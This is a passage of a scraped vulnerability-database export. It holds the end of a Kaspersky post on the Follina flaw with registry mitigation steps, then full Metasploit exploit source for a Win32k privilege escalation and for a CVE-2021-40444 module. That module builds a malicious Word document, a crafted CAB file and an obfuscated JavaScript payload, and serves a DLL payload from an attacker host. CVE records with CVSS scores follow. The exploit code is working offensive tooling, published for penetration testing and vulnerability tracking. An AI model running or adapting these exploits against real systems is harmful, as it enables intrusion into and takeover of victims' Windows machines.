be exploited using Microsoft Office documents. It allowed attackers to remotely execute code on Windows systems, while the victim could not even open the document containing the exploit, or open it in Protected Mode. The vulnerability, which the researchers dubbed Follina, later received the identifier [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190>).\n\n## CVE-2022-30190 technical details\n\nBriefly, the exploitation of the CVE-2022-30190 vulnerability can be described as follows. The attacker creates an MS Office document with a link to an external malicious OLE object (_**word/_rels/document.xml.rels**_), such as an HTML file located on a remote server. The data used to describe the link is placed in the **** tag with attributes _**Type=&quot;http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject&quot;, Target=&quot;http_malicious_link!&quot;**_. The link in the **Target** attribute points to the above-mentioned HTML file, inside which a malicious script is written using a special URI scheme. \nWhen opened, the attacker-created document runs MSDT. The attacker can then pass, through a set of parameters, any command to this tool for execution on the victim&#x27;s system with the privileges of the user who opened the document. What is more, the command can be passed even if the document is opened in Protected Mode and macros are disabled. \nAt the time of posting, two document formats were known to allow CVE-2022-30190 exploitation: Microsoft Word (.docx) and Rich Text Format (.rtf). The latter is more dangerous for the potential victim because it allows execution of a malicious command even without opening the document \u2014 just previewing it in Windows Explorer is enough.\n\n## Protecting against Follina\n\nKaspersky is aware of attempts to exploit the CVE-2022-30190 vulnerability through Microsoft Office documents. Our solutions protect against this using the [Behavior Detection](<https://www.kaspersky.com/enterprise-security/wiki-section/products/behavior-based-protection>) and [Exploit Prevention](<https://www.kaspersky.com/enterprise-security/wiki-section/products/exploit-prevention>) tools. \nThe following verdict names are possible:\n\n * PDM:Exploit.Win32.Generic \n * HEUR:Exploit.MSOffice.Agent.n\n * HEUR:Exploit.MSOffice.Agent.gen \n * HEUR:Exploit.MSOffice.CVE-2017-0199.a\n * HEUR:Exploit.MSOffice.CVE-2021-40444.a\n * HEUR:Exploit.MSOffice.Generic\n\n_Geography of Follina exploitation attempts with Exploit.MSOffice.CVE-2021-40444.a verdict, May 1 \u2013 June 3, 2022 ([download](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/08064948/01-en-cve-2022-30190.png>))_\n\nWe expect to see more Follina exploitation attempts to gain access to corporate resources, including for ransomware attacks and data breaches. Therefore, we continue to closely monitor the situation and improve overall vulnerability detection. In addition, as part of the [Managed Detection and Response](<https://www.kaspersky.com/enterprise-security/managed-detection-and-response>) service, our SOC experts can detect vulnerability exploitation, investigate attacks and provide clients with all necessary threat-related information. \nTo protect against Follina exploitation, we strongly advise that you follow Microsoft&#x27;s own guidelines: [Guidance for CVE-2022-30190 Microsoft Support Diagnostic Tool Vulnerability](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>). In particular, to prevent exploitation of this vulnerability, you can disable support for the MSDT URL protocol by taking these steps:\n\n 1. Run Command Prompt as Administrator.\n 2. To back up the registry key, execute the command &quot;reg export HKEY_CLASSES_ROOT\\ms-msdt filename&quot;\n 3. Execute the command &quot;reg delete HKEY_CLASSES_ROOT\\ms-msdt /f&quot;.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-06-06T08:00:02", "type": "securelist", "title": "CVE-2022-30190 (Follina) vulnerability in MSDT: description and counteraction", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0199", "CVE-2021-40444", "CVE-2022-30190"], "modified": "2022-06-06T08:00:02", "id": "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "href": "https://securelist.com/cve-2022-30190-follina-vulnerability-in-msdt-description-and-counteraction/106703/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2023-06-14T15:40:33", "description": "A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to achieve an out of bounds write operation, eventually leading to privilege escalation. This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021. In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to function on a wider range of Windows 10 targets.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-02-18T20:23:38", "type": "metasploit", "title": "Win32k ConsoleControl Offset Confusion", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-7255", "CVE-2021-1732", "CVE-2022-21882"], "modified": "2023-05-25T04:36:46", "id": "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-", "href": "https://www.rapid7.com/db/modules/exploit/windows/local/cve_2022_21882_win32k/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = AverageRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Priv\n include Msf::Post::Windows::Process\n include Msf::Post::Windows::ReflectiveDLLInjection\n prepend Msf::Exploit::Remote::AutoCheck\n\n include Msf::Exploit::Deprecated\n moved_from 'exploit/windows/local/cve_2021_1732_win32k'\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'Win32k ConsoleControl Offset Confusion',\n 'Description' => %q{\n A vulnerability exists within win32k that can be leveraged by an attacker to escalate privileges to those of\n NT AUTHORITY\\SYSTEM. The flaw exists in how the WndExtra field of a window can be manipulated into being\n treated as an offset despite being populated by an attacker-controlled value. This can be leveraged to\n achieve an out of bounds write operation, eventually leading to privilege escalation.\n\n This flaw was originally identified as CVE-2021-1732 and was patched by Microsoft on February 9th, 2021.\n In early 2022, a technique to bypass the patch was identified and assigned CVE-2022-21882. The root cause is\n is the same for both vulnerabilities. This exploit combines the patch bypass with the original exploit to\n function on a wider range of Windows 10 targets.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n # CVE-2021-1732\n 'BITTER APT', # exploit as used in the wild\n 'JinQuan', # detailed analysis\n 'MaDongZe', # detailed analysis\n 'TuXiaoYi', # detailed analysis\n 'LiHao', # detailed analysis\n # CVE-2022-21882\n 'L4ys', # github poc\n # both CVEs\n 'KaLendsi', # github pocs\n # Metasploit exploit\n 'Spencer McIntyre' # metasploit module\n ],\n 'Arch' => [ ARCH_X64 ],\n 'Platform' => 'win',\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread'\n },\n 'Targets' => [\n [ 'Windows 10 v1803-21H2 x64', { 'Arch' => ARCH_X64 } ]\n ],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'References' => [\n # CVE-2021-1732 references\n [ 'CVE', '2021-1732' ],\n [ 'URL', 'https://ti.dbappsecurity.com.cn/blog/index.php/2021/02/10/windows-kernel-zero-day-exploit-is-used-by-bitter-apt-in-targeted-attack/' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2021-1732-Exploit' ],\n [ 'URL', 'https://attackerkb.com/assessments/1a332300-7ded-419b-b717-9bf03ca2a14e' ],\n [ 'URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1732' ],\n # the rest are not cve-2021-1732 specific but are on topic regarding the techniques used within the exploit\n [ 'URL', 'https://www.fuzzysecurity.com/tutorials/expDev/22.html' ],\n [ 'URL', 'https://www.geoffchappell.com/studies/windows/win32/user32/structs/wnd/index.htm' ],\n [ 'URL', 'https://byteraptors.github.io/windows/exploitation/2020/06/03/exploitingcve2019-1458.html' ],\n [ 'URL', 'https://www.trendmicro.com/en_us/research/16/l/one-bit-rule-system-analyzing-cve-2016-7255-exploit-wild.html' ],\n # CVE-2022-21882 references\n [ 'CVE', '2022-21882' ],\n [ 'URL', 'https://github.com/L4ys/CVE-2022-21882' ],\n [ 'URL', 'https://github.com/KaLendsi/CVE-2022-21882' ]\n ],\n 'DisclosureDate' => '2021-02-09', # CVE-2021-1732 disclosure date\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [ CRASH_OS_RESTARTS, ],\n 'Reliability' => [ REPEATABLE_SESSION, ],\n 'SideEffects' => []\n }\n }\n )\n )\n end\n\n def check\n if session.platform != 'windows'\n # Non-Windows systems are definitely not affected.\n return Exploit::CheckCode::Safe\n end\n\n version = get_version_info\n vprint_status(\"Windows Build Number = #{version.product_name}\")\n if version.build_number.between?(Msf::WindowsVersion::Win10_1803, Msf::WindowsVersion::Win10_21H2)\n CheckCode::Appears\n elsif version.build_number == Msf::WindowsVersion::Server2022 || version.build_number == Msf::WindowsVersion::Win11_21H2\n CheckCode::Detected(\"May be vulnerable, but exploit not tested on #{version.product_name}\")\n else\n print_error('Vulnerability only present on Windows 10 versions 1803 - 21H2, Windows 11 21H2, Server 2019 and Server 2022')\n return CheckCode::Safe\n end\n end\n\n def exploit\n if is_system?\n fail_with(Failure::None, 'Session is already elevated')\n end\n\n if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86\n fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')\n elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86\n fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')\n elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64\n fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')\n end\n\n encoded_payload = payload.encoded\n execute_dll(\n ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2022-21882', 'CVE-2022-21882.x64.dll'),\n [encoded_payload.length].pack('I<') + encoded_payload\n )\n\n print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/cve_2022_21882_win32k.rb", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T15:44:17", "description": "This module creates a malicious docx file that when opened in Word on a vulnerable Windows system will lead to code execution. This vulnerability exists because an attacker can craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine.\n", "cvss3": {}, "published": "2021-11-09T11:18:58", "type": "metasploit", "title": "Microsoft Office Word Malicious MSHTML RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2021-12-08T22:22:44", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_mshtml_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word Malicious MSHTML RCE',\n 'Description' => %q{\n This module creates a malicious docx file that when opened in Word on a vulnerable Windows\n system will lead to code execution. This vulnerability exists because an attacker can\n craft a malicious ActiveX control to be used by a Microsoft Office document that hosts\n the browser rendering engine.\n },\n 'References' => [\n ['CVE', '2021-40444'],\n ['URL', 'https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444'],\n ['URL', 'https://www.sentinelone.com/blog/peeking-into-cve-2021-40444-ms-office-zero-day-vulnerability-exploited-in-the-wild/'],\n ['URL', 'http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf'],\n ['URL', 'https://github.com/lockedbyte/CVE-2021-40444/blob/master/REPRODUCE.md'],\n ['URL', 'https://github.com/klezVirus/CVE-2021-40444']\n ],\n 'Author' => [\n 'lockedbyte ', # Vulnerability discovery.\n 'klezVirus ', # References and PoC.\n 'thesunRider', # Official Metasploit module.\n 'mekhalleh (RAMELLA S\u00e9bastien)' # Zeop-CyberSecurity - code base contribution and refactoring.\n ],\n 'DisclosureDate' => '2021-09-23',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'Payload' => {\n 'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'FILENAME' => 'msf.docx'\n },\n 'Targets' => [\n [\n 'Hosted', {}\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n register_advanced_options([\n OptPath.new('DocxTemplate', [ false, 'A DOCX file that will be used as a template to build the exploit.' ]),\n ])\n end\n\n def bin_to_hex(bstr)\n return(bstr.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join)\n end\n\n def cab_checksum(data, seed = \"\\x00\\x00\\x00\\x00\")\n checksum = seed\n\n bytes = ''\n data.chars.each_slice(4).map(&:join).each do |dword|\n if dword.length == 4\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*')\n else\n bytes = dword\n end\n end\n checksum = checksum.reverse\n\n case (data.length % 4)\n when 3\n dword = \"\\x00#{bytes}\"\n when 2\n dword = \"\\x00\\x00#{bytes}\"\n when 1\n dword = \"\\x00\\x00\\x00#{bytes}\"\n else\n dword = \"\\x00\\x00\\x00\\x00\"\n end\n\n checksum = checksum.unpack('C*').zip(dword.unpack('C*')).map { |a, b| a ^ b }.pack('C*').reverse\n end\n\n # http://download.microsoft.com/download/4/d/a/4da14f27-b4ef-4170-a6e6-5b1ef85b1baa/[ms-cab].pdf\n def create_cab(data)\n cab_cfdata = ''\n filename = \"../#{File.basename(@my_resources.first)}.inf\"\n block_size = 32768\n struct_cffile = 0xd\n struct_cfheader = 0x30\n\n block_counter = 0\n data.chars.each_slice(block_size).map(&:join).each do |block|\n block_counter += 1\n\n seed = \"#{[block.length].pack('S')}#{[block.length].pack('S')}\"\n csum = cab_checksum(block, seed)\n\n vprint_status(\"Data block added w/ checksum: #{bin_to_hex(csum)}\")\n cab_cfdata << csum # uint32 {4} - Checksum\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Compressed Data Length\n cab_cfdata << [block.length].pack('S') # uint16 {2} - Uncompressed Data Length\n cab_cfdata << block\n end\n\n cab_size = [\n struct_cfheader +\n struct_cffile +\n filename.length +\n cab_cfdata.length\n ].pack('L<')\n\n # CFHEADER (http://wiki.xentax.com/index.php/Microsoft_Cabinet_CAB)\n cab_header = \"\\x4D\\x53\\x43\\x46\" # uint32 {4} - Header (MSCF)\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << cab_size # uint32 {4} - Archive Length\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n\n cab_header << \"\\x2C\\x00\\x00\\x00\" # uint32 {4} - Offset to the first CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Reserved (null)\n cab_header << \"\\x03\" # byte {1} - Minor Version (3)\n cab_header << \"\\x01\" # byte {1} - Major Version (1)\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Folders\n cab_header << \"\\x01\\x00\" # uint16 {2} - Number of Files\n cab_header << \"\\x00\\x00\" # uint16 {2} - Flags\n\n cab_header << \"\\xD2\\x04\" # uint16 {2} - Cabinet Set ID Number\n cab_header << \"\\x00\\x00\" # uint16 {2} - Sequential Number of this Cabinet file in a Set\n\n # CFFOLDER\n cab_header << [ # uint32 {4} - Offset to the first CFDATA in this Folder\n struct_cfheader +\n struct_cffile +\n filename.length\n ].pack('L<')\n cab_header << [block_counter].pack('S<') # uint16 {2} - Number of CFDATA blocks in this Folder\n cab_header << \"\\x00\\x00\" # uint16 {2} - Compression Format for each CFDATA in this Folder (1 = MSZIP)\n\n # increase file size to trigger vulnerability\n cab_header << [ # uint32 {4} - Uncompressed File Length (\"\\x02\\x00\\x5C\\x41\")\n data.length + 1073741824\n ].pack('L<')\n\n # set current date and time in the format of cab file\n date_time = Time.new\n date = [((date_time.year - 1980) << 9) + (date_time.month << 5) + date_time.day].pack('S')\n time = [(date_time.hour << 11) + (date_time.min << 5) + (date_time.sec / 2)].pack('S')\n\n # CFFILE\n cab_header << \"\\x00\\x00\\x00\\x00\" # uint32 {4} - Offset in the Uncompressed CFDATA for the Folder this file belongs to (relative to the start of the Uncompressed CFDATA for this Folder)\n cab_header << \"\\x00\\x00\" # uint16 {2} - Folder ID (starts at 0)\n cab_header << date # uint16 {2} - File Date (\\x5A\\x53)\n cab_header << time # uint16 {2} - File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "prion": [{"lastseen": "2023-08-16T03:13:02", "description": "A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 15.2 and iPadOS 15.2. An application may be able to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T19:15:00", "type": "prion", "title": "CVE-2021-30983", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30983"], "modified": "2023-08-08T14:21:00", "id": "PRION:CVE-2021-30983", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-30983", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T07:08:19", "description": "In kbase_jd_user_buf_pin_pages of mali_kbase_mem.c, there is a possible out of bounds write due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-210470189References: N/A", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-16T15:15:00", "type": "prion", "title": "CVE-2021-39793", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-39793"], "modified": "2022-03-23T19:25:00", "id": "PRION:CVE-2021-39793", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-39793", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-08-16T01:09:20", "description": "Use after free in V8 in Google Chrome prior to 89.0.4389.114 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-04-09T22:15:00", "type": "prion", "title": "CVE-2021-21195", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21195"], "modified": "2021-06-01T20:25:00", "id": "PRION:CVE-2021-21195", "href": "https://kb.prio-n.com/vulnerability/CVE-2021-21195", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-16T06:34:12", "description": "Windows LSA Spoofing Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2021-08-12T18:15:00", "type": "prion", "title": "CVE-2021-36942", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": 